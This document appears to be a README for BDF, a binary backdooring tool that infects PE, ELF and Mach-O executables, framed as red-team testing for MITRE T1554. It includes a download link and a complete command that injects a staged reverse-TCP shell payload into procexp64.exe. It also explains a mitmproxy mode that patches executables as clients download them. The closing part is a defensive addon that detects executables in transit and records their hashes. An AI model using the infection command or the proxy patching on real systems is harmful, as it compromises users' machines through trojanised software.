If someone manages to make this work with Windows CAB files and/or MSP, message me.
Release branch: https://ufile.io/q9ypkduq
What is BDF
BDF lets Blue, Purple and Red teamers test against MITRE ATT&CK technique T1554, Compromise Client Software Binary: https://attack.mitre.org/techniques/T1554/
In short:
- It's a stand-alone file infector for the Mach-O, ELF and PE file formats.
- It's also a mitmproxy add-on, so it can patch executables on the fly as they are downloaded over HTTP.
Alpha
THIS IS Alpha
This supports:
- PE
  - x86
  - x64
- Mach-O
  - x86
  - x64
  - M1 (arm64)
- ELF
  - ET_EXEC
  - ET_DYN
  - x86
  - x64
  - ARMv7
Install
For this to work, you'll need Python 3.9 or newer; the dependencies are listed in requirements.txt.
Run ./install.zsh (you might need sudo, depending on where your Python packages install).
BDFProxy example:
Without mitmproxy
$ ./backdoor.py -f tests/procexp64.exe PATCH_METHOD=jmp_at_entrypoint -q MODE=text_loader_single_cave PAYLOAD=text_loader_reverse_tcp_staged_threaded HOST=172.16.64.1 PORT=9090 ENCODER=None -o procexp64_text.exe VERBOSE=False MODIFIER=manual
With mitmproxy
Edit proxy.cfg to your liking.
In terminal one:
$ touch bdf.log
$ tail -f bdf.log
Terminal two:
$ mitmproxy -s ./backdoor.py
Then point the client you want to test at the proxy on port 8080 (mitmproxy's default listen port). Every executable the client fetches over HTTP now passes through backdoor.py and comes out patched.
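The mitmproxy add-on mode described above works because mitmproxy hands every HTTP response to a script loaded with `-s`, and the script must first recognise which bodies are executables before it can rewrite them. As an added example that is not BDF's own code, here is a minimal add-on in the same `-s script.py` style: it classifies PE, ELF and Mach-O bodies by their headers (the formats and architectures in the support list above) and logs the format and SHA-256 of each one instead of patching it, which is the check a blue team would run alongside a BDF test. The `response` hook, `flow.response.content`, `flow.request.pretty_url` and the module-level `addons` list are mitmproxy's real addon API; the class name, helper names and the header stubs used as samples are assumptions made for this example.

```python
# Added example, not part of BDF: a mitmproxy addon that spots executables in
# HTTP responses by their headers and logs format + SHA-256. Run it like the
# page runs backdoor.py:  mitmproxy -s spotter.py  (class/helper names are ours)
import hashlib
import logging
import struct
from typing import Optional

log = logging.getLogger(__name__)

_PE_MACHINES = {0x014C: "x86", 0x8664: "x64"}
_ELF_MACHINES = {0x03: "x86", 0x28: "ARMv7", 0x3E: "x64"}
_ELF_TYPES = {2: "ET_EXEC", 3: "ET_DYN"}
# Mach-O cputype values (CPU_ARCH_ABI64 = 0x01000000 marks the 64-bit ones).
_MACHO_CPUTYPES = {0x7: "x86", 0x01000007: "x64", 0xC: "arm", 0x0100000C: "arm64"}


def classify_executable(data: bytes) -> Optional[str]:
    """Describe the executable format of `data`, or return None if it is not one."""
    # PE: "MZ" stub, e_lfanew at 0x3c points at "PE\0\0", then the COFF Machine field.
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if len(data) >= e_lfanew + 6 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
            return f"PE {_PE_MACHINES.get(machine, hex(machine))}"
        return None
    # ELF: e_ident gives class and byte order; e_type/e_machine sit at offset 16.
    if data[:4] == b"\x7fELF" and len(data) >= 20:
        endian = "<" if data[5] == 1 else ">"
        e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
        bits = "64-bit" if data[4] == 2 else "32-bit"
        kind = _ELF_TYPES.get(e_type, hex(e_type))
        arch = _ELF_MACHINES.get(e_machine, hex(e_machine))
        return f"ELF {kind} {bits} {arch}"
    magic = data[:4]
    # Thin Mach-O, little-endian on disk: MH_MAGIC 0xfeedface / MH_MAGIC_64 0xfeedfacf.
    if magic in (b"\xce\xfa\xed\xfe", b"\xcf\xfa\xed\xfe") and len(data) >= 8:
        bits = "64-bit" if magic[0] == 0xCF else "32-bit"
        cputype = struct.unpack_from("<I", data, 4)[0]
        return f"Mach-O {bits} {_MACHO_CPUTYPES.get(cputype, hex(cputype))}"
    # Fat/universal Mach-O: FAT_MAGIC 0xcafebabe big-endian, then nfat_arch.
    # Java class files share the magic but carry minor/major version (major >= 45)
    # in those bytes, so a small nfat_arch is the usual disambiguator.
    if magic == b"\xca\xfe\xba\xbe" and len(data) >= 8:
        nfat_arch = struct.unpack_from(">I", data, 4)[0]
        if 1 <= nfat_arch <= 16:
            return "Mach-O fat/universal"
    return None


def summarize_body(url: str, content_type: str, body: bytes) -> Optional[dict]:
    """What gets logged for one response, or None when the body is not an executable."""
    fmt = classify_executable(body)
    if fmt is None:
        return None
    return {"url": url, "content_type": content_type, "format": fmt,
            "size": len(body), "sha256": hashlib.sha256(body).hexdigest()}


class ExecutableSpotter:
    """mitmproxy addon. A patching proxy like BDF would rewrite
    flow.response.content here; this one only records what passed through."""

    def response(self, flow) -> None:
        resp = flow.response
        if resp is None or resp.content is None:  # .content is the decoded body
            return
        summary = summarize_body(flow.request.pretty_url,
                                 resp.headers.get("content-type", ""), resp.content)
        if summary is not None:
            log.warning("executable seen: %s", summary)


addons = [ExecutableSpotter()]


def constructed_samples() -> dict:
    """Hand-built header stubs, constructed for this example (not real binaries)."""
    return {
        "pe_x64": b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0"
                  + struct.pack("<H", 0x8664) + b"\0" * 20,
        "elf_dyn_x64": b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8
                       + struct.pack("<HH", 3, 0x3E) + b"\0" * 20,
        "macho_arm64": struct.pack("<II", 0xFEEDFACF, 0x0100000C) + b"\0" * 24,
        "fat": struct.pack(">II", 0xCAFEBABE, 2) + b"\0" * 40,
        "java_class": struct.pack(">IHH", 0xCAFEBABE, 0, 52),
        "html": b"<html><body>not an executable</body></html>",
    }


if __name__ == "__main__":
    for name, blob in constructed_samples().items():
        print(f"{name:12} -> {classify_executable(blob)}")
```

Running this beside a BDF test gives you the SHA-256 of every binary as the client actually received it; comparing those hashes against the publisher's hashes is the simplest way to show that a T1554-style in-transit patch happened. Note that the classifier only looks at headers, so a patched file still classifies the same as the original; the hash is what changes.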